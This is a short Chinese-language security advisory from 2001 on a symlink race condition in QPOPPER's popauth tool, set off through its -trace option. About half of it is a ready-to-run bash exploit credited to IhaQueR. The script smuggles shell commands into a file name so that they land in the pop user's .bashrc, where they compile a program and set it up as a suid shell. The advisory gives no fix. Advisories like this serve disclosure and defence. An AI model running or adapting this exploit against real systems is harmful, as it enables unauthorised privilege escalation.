popauth存在符号连接漏洞发布时间:2001-12-19 更新时间:2001-12-19 严重程度:中 威胁程度:权限提升 错误类型:竞争条件 利用方式:服务器模式 受影响系统 popauth详细描述 popauth是QPOPER包中的一个工具,其中存在符号连接攻击,程序一般以suid pop 安装,在-trace文件选项中存在符号连接攻击。 测试代码 如下脚本可以产生suid-pop shell: #!/bin/bash # popauth symlink follow vuln by IhaQueR # this will create .bashrc for user pop # and ~pop/sup suid shell FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""') ln -s /var/lib/pop/.bashrc "$FILE" /usr/sbin/popauth -trace "$FILE" 解决方案 尚无 相关信息 |
